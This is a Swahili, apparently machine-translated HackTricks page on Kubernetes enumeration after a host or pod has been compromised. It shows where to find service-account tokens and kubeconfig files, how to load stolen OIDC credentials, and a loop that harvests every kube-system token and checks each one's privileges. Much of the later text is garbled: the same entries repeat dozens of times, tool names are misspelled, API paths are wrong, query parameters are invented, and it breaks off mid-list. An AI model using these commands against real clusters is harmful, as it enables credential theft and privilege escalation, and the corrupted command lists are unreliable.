Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Kubernetes Enumeration

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Vitambulisho vya Kubernetes

Ikiwa umepata ufikiaji uliodhuru kwenye mashine, mtumiaji anaweza kuwa na ufikiaji kwenye jukwaa la Kubernetes. Kifunguo kawaida kipo kwenye faili inayoelekezwa na env var KUBECONFIG au ndani ya ~/.kube.

Katika folda hii unaweza kupata faili za usanidi na vitambulisho na usanidi wa kuunganisha kwenye seva ya API. Katika folda hii pia unaweza kupata folda ya cache na habari iliyopatikana hapo awali.

Ikiwa umedhuru pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata vitambulisho na habari kuhusu mazingira ya sasa ya K8:

Vitambulisho vya Akaunti ya Huduma

Kabla ya kuendelea, ikiwa haujui ni nini Akaunti ya Huduma katika Kubernetes ningependekeza ufuatilie kiungo hiki na usome angalau habari kuhusu usanifu wa Kubernetes.

Iliyochukuliwa kutoka kwenye hati ya Kubernetes:

“Unapounda pod, ikiwa haujataja akaunti ya huduma, inapewa moja kwa moja akaunti ya huduma ya msingi katika jina sawa la uga.”

Akaunti ya Huduma ni kitu kinachosimamiwa na Kubernetes na hutumiwa kutoa kitambulisho kwa michakato inayofanya kazi kwenye pod. Kila akaunti ya huduma ina siri inayohusiana nayo na siri hii ina kificho cha kubeba. Hii ni JSON Web Token (JWT), njia ya kuwakilisha madai kwa usalama kati ya pande mbili.

Kawaida moja ya miongozo:

  • /run/secrets/kubernetes.io/serviceaccount

  • /var/run/secrets/kubernetes.io/serviceaccount

  • /secrets/kubernetes.io/serviceaccount

inajumuisha faili:

  • ca.crt: Ni cheti cha ca cha kuangalia mawasiliano ya kubernetes

  • namespace: Inaonyesha uga wa sasa

  • token: Ina kitambulisho cha huduma cha pod ya sasa.

Sasa ukishapata kifunguo, unaweza kupata seva ya API ndani ya mazingira ya mazingira ya KUBECONFIG. Kwa habari zaidi endesha (env | set) | grep -i "kuber|kube"

Kitambulisho cha akaunti ya huduma kinatia saini na funguo inayokaa kwenye faili sa.key na kuthibitishwa na sa.pub.

Mahali pa kawaida kwenye Kubernetes:

  • /etc/kubernetes/pki

Mahali pa kawaida kwenye Minikube:

  • /var/lib/localkube/certs

Podi za Moto

Podi za moto ni podi zinazojumuisha kitambulisho cha akaunti ya huduma yenye mamlaka. Kitambulisho cha akaunti ya huduma yenye mamlaka ni kitambulisho chenye ruhusa ya kufanya kazi zenye mamlaka kama kutaja siri, kuunda podi, n.k.

RBAC

Ikiwa haujui ni nini RBAC, soma sehemu hii.

Orodha ya Uchambuzi

Ili kuchambua mazingira ya K8s unahitaji haya:

  • Kitambulisho cha uthibitishaji kilicho halali. Katika sehemu iliyopita tuliona wapi kutafuta kitambulisho cha mtumiaji na kitambulisho cha akaunti ya huduma.

  • Anwani (https://host:port) ya API ya Kubernetes. Hii kawaida inaweza kupatikana katika mazingira ya mazingira na/au kwenye faili ya kube config.

  • Hiari: ca.crt kuthibitisha seva ya API. Hii inaweza kupatikana mahali pamoja na kitambulisho. Hii ni muhimu kuthibitisha cheti cha seva ya API, lakini kwa kutumia --insecure-skip-tls-verify na kubectl au -k na curl hautahitaji hii.

Kwa maelezo hayo unaweza kuchambua kubernetes. Ikiwa API kwa sababu fulani ni inapatikana kupitia Intaneti, unaweza tu kupakua habari hiyo na kuchambua jukwaa kutoka kwa mwenyeji wako.

Walakini, kawaida seva ya API iko ndani ya mtandao wa ndani, kwa hivyo utahitaji kuunda handaki kupitia mashine iliyodhuriwa ili kupata kutoka kwa mashine yako, au unaweza kupakia kubectl binary, au tumia curl/wget/chochote kufanya maombi ya HTTP ya moja kwa moja kwa seva ya API.

Tofauti kati ya vitenzi vya list na get

Kwa ruhusa za kupata unaweza kupata habari ya mali maalum (chaguo la eleza katika kubectl) API:

GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}

Ikiwa una ruhusa ya orodha, unaruhusiwa kutekeleza maombi ya API ya kuorodhesha aina fulani ya mali (chaguo la pata katika kubectl):

#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments

Ikiwa una ruhusa ya watch, unaruhusiwa kutekeleza maombi ya API kufuatilia mali:

GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
GET /apis/apps/v1/watch/deployments  [DEPRECATED]

Wanafungua uhusiano wa kustream ambao unakurudishia hati kamili ya Deployment kila wakati inabadilika (au wakati mpya inaundwa).

Amri za kubectl zifuatazo zinaonyesha jinsi ya kuorodhesha vitu tu. Ikiwa unataka kupata data unahitaji kutumia describe badala ya get

Kutumia curl

Kutoka ndani ya podi unaweza kutumia mazingira kadhaa ya env:

export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.

Kwa chaguo-msingi pod inaweza kupata kube-api server kwa jina la uwanja kubernetes.default.svc na unaweza kuona mtandao wa kube katika /etc/resolv.config kwa sababu hapa utapata anwani ya kisanduku cha DNS cha kubernetes (".1" ya safu hiyo hiyo ni mwisho wa kube-api).

Kutumia kubectl

Ukiwa na tokeni na anwani ya seva ya API unatumia kubectl au curl kufikia kama ilivyoelezwa hapa:

Kwa chaguo-msingi, APISERVER ina mawasiliano na https:// muundo

alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true'

if no https:// in url, you may get Error Like Bad Request.

Unaweza kupata karatasi ya kucheat rasmi ya kubectl hapa. Lengo la sehemu zifuatazo ni kutoa kwa mpangilio tofauti chaguo mbalimbali za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji.

Ili kupata ombi la HTTP ambalo kubectl inatuma, unaweza kutumia parameter -v=8

MitM kubectl - Kuproxify kubectl

# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true

Mpangilio wa Sasa

kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>

Ikiwa umefanikiwa kuiba baadhi ya siri za watumiaji unaweza kuziweka kwenye mazingira ya ndani kwa kutumia kitu kama:

kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )

Pata Rasilimali Zinazoungwa

Kwa habari hii utajua huduma zote unazoweza kuorodhesha

k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace

Pata Mamlaka ya Sasa

k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>

Uchunguzi wa Kubernetes

  1. Kutumia kubectl

    kubectl get all --all-namespaces
kubectl get pods --all-namespaces
kubectl get pods -o wide --all-namespaces
kubectl get svc --all-namespaces
kubectl get endpoints --all-namespaces
kubectl get secrets --all-namespaces
kubectl get configmaps --all-namespaces
kubectl get roles --all-namespaces
kubectl get rolebindings --all-namespaces
kubectl get clusterroles
kubectl get clusterrolebindings

  2. Kutumia kubetcl

    kubetcl get all --all-namespaces
kubetcl get pods --all-namespaces
kubetcl get pods -o wide --all-namespaces
kubetcl get svc --all-namespaces
kubetcl get endpoints --all-namespaces
kubetcl get secrets --all-namespaces
kubetcl get configmaps --all-namespaces
kubetcl get roles --all-namespaces
kubetcl get rolebindings --all-namespaces
kubetcl get clusterroles
kubetcl get clusterrolebindings

  3. Kutumia kubens

    kubens
kubens -h

  4. Kutumia kubectx

    kubectx
kubectx -h

  5. Kutumia kubectx na kubens

    kubectx
kubens

  6. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  7. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  8. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  9. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  10. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  11. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  12. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  13. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  14. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  15. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  16. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  17. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  18. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  19. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens

  20. Kutumia kubectx na kubens kwa njia ya kifupi

    kubectx
kubens
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"

Njia nyingine ya kuangalia mamlaka yako ni kutumia zana: https://github.com/corneliusweig/rakkess****

Unaweza kujifunza zaidi kuhusu Kubernetes RBAC katika:

pageKubernetes Role-Based Access Control(RBAC)

Marakwet unapojua ni mamlaka zipi unazo, angalia ukurasa ufuatao kubaini kama unaweza kuzitumia vibaya kwa kuboresha mamlaka:

pageAbusing Roles/ClusterRoles in Kubernetes

Pata Majukumu Mengine

k get roles
k get clusterroles

Ikiwa unaweza kusoma siri unaweza kutumia mistari ifuatayo kupata mamlaka yanayohusiana na kila token:

for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done

Pata Akaunti za Huduma

Kama ilivyozungumziwa mwanzoni mwa ukurasa huu wakati podi inapoendeshwa akaunti ya huduma kawaida hupewa. Hivyo, kuorodhesha akaunti za huduma, ruhusa zao na wanakotumika inaweza kuruhusu mtumiaji kupandisha viwango vya ruhusa.

k get serviceaccounts

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuomba API Server Version

    curl -k https://<kubernetes-apiserver>/version

  2. Kuomba Endpoints za API Server

    curl -k https://<kubernetes-apiserver>/api
curl -k https://<kubernetes-apiserver>/apis

  3. Kuomba Rasilimali za API Server

    curl -k https://<kubernetes-apiserver>/api/v1
curl -k https://<kubernetes-apiserver>/apis/apps/v1

  4. Kuomba Taarifa za API Server

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces
curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces

  5. Kuomba Taarifa za Pods

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods
curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/pods

  6. Kuomba Taarifa za Services

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/services
curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/services

  7. Kuomba Taarifa za Nodes

    curl -k https://<kubernetes-apiserver>/api/v1/nodes
curl -k https://<kubernetes-apiserver>/apis/apps/v1/nodes

  8. Kuomba Taarifa za Deployments

    curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/deployments

  9. Kuomba Taarifa za ConfigMaps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/configmaps
curl -k https://kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/configmaps

  10. Kuomba Taarifa za Secrets

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/secrets
curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/secrets

  11. Kuomba Taarifa za RBAC

    curl -k https://<kubernetes-apiserver>/apis/rbac.authorization.k8s.io/v1/clusterroles
curl -k https://<kubernetes-apiserver>/apis/rbac.authorization.k8s.io/v1/clusterrolebindings

  12. Kuomba Taarifa za StorageClasses

    curl -k https://<kubernetes-apiserver>/apis/storage.k8s.io/v1/storageclasses

  13. Kuomba Taarifa za Events

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/events

  14. Kuomba Taarifa za Ingress

    curl -k https://<kubernetes-apiserver>/apis/networking.k8s.io/v1/namespaces/<namespace>/ingresses

  15. Kuomba Taarifa za NetworkPolicies

    curl -k https://<kubernetes-apiserver>/apis/networking.k8s.io/v1/namespaces/<namespace>/networkpolicies

  16. Kuomba Taarifa za PodSecurityPolicies

    curl -k https://<kubernetes-apiserver>/apis/policy/v1beta1/podsecuritypolicies

  17. Kuomba Taarifa za CustomResourceDefinitions

    curl -k https://<kubernetes-apiserver>/apis/apiextensions.k8s.io/v1/customresourcedefinitions

  18. Kuomba Taarifa za Metrics

    curl -k https://<kubernetes-apiserver>/apis/metrics.k8s.io/v1beta1/nodes
curl -k https://<kubernetes-apiserver>/apis/metrics.k8s.io/v1beta1/pods

  19. Kuomba Taarifa za Logs

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log

  20. Kuomba Taarifa za Healthz

    curl -k https://<kubernetes-apiserver>/healthz

  21. Kuomba Taarifa za OpenAPI

    curl -k https://<kubernetes-apiserver>/openapi/v2

  22. Kuomba Taarifa za Swagger

    curl -k https://<kubernetes-apiserver>/swagger-2.0.0.json

  23. Kuomba Taarifa za Kubelet

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/stats/summary

  24. Kuomba Taarifa za Kubelet Logs

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/logs

  25. Kuomba Taarifa za Kubelet Metrics

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/metrics

  26. Kuomba Taarifa za Kubelet Spec

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/spec

  27. Kuomba Taarifa za Kubelet Healthz

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/healthz

  28. Kuomba Taarifa za Kubelet Container Logs

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>

  29. Kuomba Taarifa za Kubelet Exec

    curl -k -X POST https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/exec?command=<command>&container=<container>&stderr=true&stdout=true

  30. Kuomba Taarifa za Kubelet PortForward

    curl -k -X POST https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/portforward?ports=<port>

  31. Kuomba Taarifa za Kubelet Attach

    curl -k -X POST https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/attach?container=<container>&stderr=true&stdout=true

  32. Kuomba Taarifa za Kubelet Proxy

    curl -k -X POST https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/proxy

  33. Kuomba Taarifa za Kubelet Logs

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?tailLines=100

  34. Kuomba Taarifa za Kubelet Logs kwa Container

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  35. Kuomba Taarifa za Kubelet Logs kwa Container na Previous

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previous=true

  36. Kuomba Taarifa za Kubelet Logs kwa Container na Timestamps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true

  37. Kuomba Taarifa za Kubelet Logs kwa Container na Tail

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  38. Kuomba Taarifa za Kubelet Logs kwa Container na Since

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600

  39. Kuomba Taarifa za Kubelet Logs kwa Container na SinceTime

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z

  40. Kuomba Taarifa za Kubelet Logs kwa Container na LimitBytes

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760

  41. Kuomba Taarifa za Kubelet Logs kwa Container na PreviousCount

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previousCount=10

  42. Kuomba Taarifa za Kubelet Logs kwa Container na TailLines

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  43. Kuomba Taarifa za Kubelet Logs kwa Container na Timestamps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true

  44. Kuomba Taarifa za Kubelet Logs kwa Container na SincSeconds

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600

  45. Kuomba Taarifa za Kubelet Logs kwa Container na SinceTime

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z

  46. Kuomba Taarifa za Kubelet Logs kwa Container na LimitBytes

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760

  47. Kuomba Taarifa za Kubelet Logs kwa Container na PreviousCount

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previousCount=10

  48. Kuomba Taarifa za Kubelet Logs kwa Container na TailLines

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  49. Kuomba Taarifa za Kubelet Logs kwa Container na Timestamps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true

  50. Kuomba Taarifa za Kubelet Logs kwa Container na SincSeconds

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600

  51. Kuomba Taarifa za Kubelet Logs kwa Container na SinceTime

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z

  52. Kuomba Taarifa za Kubelet Logs kwa Container na LimitBytes

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760

  53. Kuomba Taarifa za Kubelet Logs kwa Container na PreviousCount

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previousCount=10

  54. Kuomba Taarifa za Kubelet Logs kwa Container na TailLines

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  55. Kuomba Taarifa za Kubelet Logs kwa Container na Timestamps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true

  56. Kuomba Taarifa za Kubelet Logs kwa Container na SincSeconds

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600

  57. Kuomba Taarifa za Kubelet Logs kwa Container na SinceTime

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z

  58. Kuomba Taarifa za Kubelet Logs kwa Container na LimitBytes

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760

  59. Kuomba Taarifa za Kubelet Logs kwa Container na PreviousCount

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previousCount=10

  60. Kuomba Taarifa za Kubelet Logs kwa Container na TailLines

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100

  61. Kuomba Taarifa za Kubelet Logs kwa Container na Timestamps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true

  62. Kuomba Taarifa za Kubelet Logs kwa Container na SincSeconds

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600

  63. Kuomba Taarifa za Kubelet Logs kwa Container na SinceTime

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z

  64. Kuomba Taarifa za Kubelet Logs kwa Container na LimitBytes

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760

  65. Kuomba Taarifa za Kubelet Logs kwa Container na PreviousCount

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previousCount=10

  66. Kuomba Taarifa za Kubelet Logs kwa Container na TailLines

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/
kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts

Pata Utekelezaji

Utekelezaji hufafanua vipengele vinavyohitaji kutekelezwa.

.k get deployments
k get deployments -n custnamespace

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuchunguza API Server 1.1. Pata anwani ya API Server:

    kubectl cluster-info | grep 'Kubernetes master' | awk '/http/ {print $NF}'

    1.2. Hakikisha unaweza kufikia API Server:

    curl https://<API_SERVER_IP>:<API_SERVER_PORT> --insecure

    1.3. Tumia kubetcl kuchunguza API Server:

    kubectl get all --all-namespaces

    1.4. Tumia kubetcl kuchunguza aina za rasilimali:

    kubectl api-resources

    1.5. Tumia kubetcl kuchunguza aina fulani ya rasilimali:

    kubectl get <RESOURCE_TYPE>

    1.6. Tumia kubetcl kuchunguza rasilimali katika uga fulani:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE>

    1.7. Tumia kubetcl kuchunguza rasilimali kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE>

    1.8. Tumia kubetcl kuchunguza rasilimali kwa muundo fulani:

    kubectl get <RESOURCE_TYPE> -o yaml

    1.9. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON:

    kubectl get <RESOURCE_TYPE> -o json

    1.10. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.11. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.12. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE> -o yaml

    1.13. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE> -o json

    1.14. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.15. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.16. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.17. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.18. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.19. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.20. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.21. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.22. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.23. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.24. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.25. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.26. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.27. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.28. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.29. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.30. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.31. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.32. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.33. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.34. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.35. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.36. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.37. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.38. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.39. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.40. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

